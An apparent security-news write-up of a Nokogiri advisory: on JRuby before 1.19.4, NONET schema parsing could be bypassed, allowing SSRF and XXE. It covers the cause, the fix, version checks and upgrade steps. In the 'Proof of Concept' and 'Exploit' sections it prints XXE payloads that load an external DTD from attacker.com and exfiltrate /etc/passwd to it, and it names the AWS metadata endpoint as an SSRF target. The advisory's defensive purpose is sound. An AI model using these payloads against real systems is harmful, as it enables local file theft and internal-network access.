Listen to this Post
The `NONET` parse option, which Nokogiri enables by default for `Nokogiri::XML::Schema` as a security measure (originally introduced to address CVE-2020-26247), was not correctly enforced on the JRuby implementation. This meant that even when `NONET` was set, a schema parsed with default options could still fetch external resources over the network, potentially enabling Server-Side Request Forgery (SSRF) or XML External Entity (XXE) attacks.
The root cause lies in the scheme-blocking mechanism used by JRuby. Prior to version 1.19.4, Nokogiri on JRuby employed a denylist of network schemes. However, this denylist was case-sensitive and incomplete, allowing attackers to bypass it using alternative case variations or less common URI schemes. CRuby was never affected because libxml2’s `xmlNoNetExternalEntityLoader` blocks all network schemes at the I/O layer, regardless of scheme or case, making it impervious to such bypasses.
Nokogiri 1.19.4 remediates this by replacing the denylist with an allowlist. When `NONET` is enabled, only local resources—specifically the `file:` scheme, or relative/absolute paths with no scheme—are resolved. Every network scheme (e.g., `http://`, `https://`, ftp://`, etc.) is blocked case-insensitively. This brings JRuby behavior fully in line with CRuby, closing the bypass vector.
The vulnerability is a bypass of CVE-2020-26247 and has been assessed as low severity (CVSS 2.6, CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N). It was responsibly reported by @bilerden.
<h2 style="color: blue;">DailyCVE Form</h2>
<h2 style="color: blue;">| Field | Value |</h2>
<h2 style="color: blue;">|-|-|</h2>
<h2 style="color: blue;">| Platform | Nokogiri (JRuby) |</h2>
<h2 style="color: blue;">| Version | < 1.19.4 |</h2>
<h2 style="color: blue;">| Vulnerability | XXE/SSRF via NONET bypass |</h2>
<h2 style="color: blue;">| Severity | Low (CVSS 2.6) |</h2>
<h2 style="color: blue;">| Date | 2026-06-18 |</h2>
<h2 style="color: blue;">| Prediction | Patch already released (2026-06-18) |</h2>
<h2 style="color: blue;">What Undercode Say: Analytics & Verification</h2>
<h2 style="color: blue;">Version Check</h2>
Check installed Nokogiri version gem list nokogiri Or via Bundler bundle show nokogiri Check if vulnerable (< 1.19.4) ruby -e "require 'nokogiri'; puts Nokogiri::VERSION"
<h2 style="color: blue;">Proof of Concept (JRuby Only)</h2>
The following demonstrates the vulnerability on JRuby prior to 1.19.4:
require 'nokogiri' Malicious schema that attempts to load an external DTD malicious_schema = <<~XML <?xml version="1.0"?> <!DOCTYPE schema [ <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext; ]> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="root" type="xs:string"/> </xs:schema> XML Default parse options have NONET enabled, but on JRuby it's bypassed schema = Nokogiri::XML::Schema(malicious_schema) On vulnerable JRuby, this will fetch http://attacker.com/evil.dtd
<h2 style="color: blue;">Verification After Patch</h2>
require 'nokogiri' On JRuby 1.19.4+, this will raise an error or silently fail to fetch schema = Nokogiri::XML::Schema(malicious_schema) Network requests are now blocked as intended
<h2 style="color: blue;">Allowlist Behavior (1.19.4+)</h2>
Local file - allowed
schema = Nokogiri::XML::Schema(File.read("local.xsd"))
Network - blocked (case-insensitive)
schema = Nokogiri::XML::Schema('http://example.com/schema.xsd') blocked
schema = Nokogiri::XML::Schema('HTTP://example.com/schema.xsd') also blocked
<h2 style="color: blue;">Exploit</h2>
An attacker can exploit this vulnerability by providing a crafted XML Schema that includes external entity references pointing to attacker‑controlled resources. When parsed on a vulnerable JRuby instance, the schema will fetch those external resources, enabling:
- SSRF: The attacker can make the server issue requests to internal networks (e.g.,http://169.254.169.254/latest/meta-data/` on AWS) or other restricted endpoints.
– XXE: The attacker can read local files (via file:///etc/passwd) or trigger denial‑of‑service via recursive entity expansion.
Example XXE payload:
<?xml version="1.0"?> <!DOCTYPE schema [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com/?%file;'>"> %eval; %exfil; ]> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="root" type="xs:string"/> </xs:schema>
On vulnerable JRuby, this would exfiltrate `/etc/passwd` to the attacker’s server.
Protection
1. Upgrade to Nokogiri 1.19.4 or later
gem update nokogiri Or in Gemfile gem 'nokogiri', '>= 1.19.4' bundle update nokogiri
2. If Upgrading Is Not Immediately Possible
There are no known workarounds for affected versions. However, if you absolutely must use an older version and fully trust the schema input, you can explicitly disable `NONET` (but this re‑enables the very risk the flag was meant to prevent):
ONLY for trusted input – do NOT use with untrusted data schema = Nokogiri::XML::Schema.new( trusted_schema, Nokogiri::XML::ParseOptions.new.nononet disables NONET )
Warning: This should only be done when the schema source is completely trusted and cannot be tampered with.
3. Runtime Detection (JRuby)
To detect if your JRuby environment is vulnerable:
if defined?(JRUBY_VERSION) && Nokogiri::VERSION < '1.19.4' puts "WARNING: Vulnerable to GHSA-8678-w3jw-xfc2" end
Impact
| Aspect | Details |
|–||
| Confidentiality | Low – Attacker may read local files or internal network responses (SSRF) |
| Integrity | None – No data modification possible |
| Availability | None – No direct DoS impact |
| Attack Vector | Network – Attacker supplies malicious XML Schema |
| Attack Complexity | High – Requires crafted schema and specific JRuby environment |
| Privileges Required | Low – Attacker needs to supply input to the parser |
| User Interaction | Required – Victim must parse the attacker‑supplied schema |
| Scope | Unchanged – Exploitation does not affect other components |
Real‑world scenarios:
- A Ruby web application running on JRuby that validates user‑supplied XML Schemas.
- Any service that uses `Nokogiri::XML::Schema` with default options on JRuby.
References:
- GitHub Advisory: GHSA-8678-w3jw-xfc2
- Nokogiri Release v1.19.4
- Original CVE-2020-26247
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
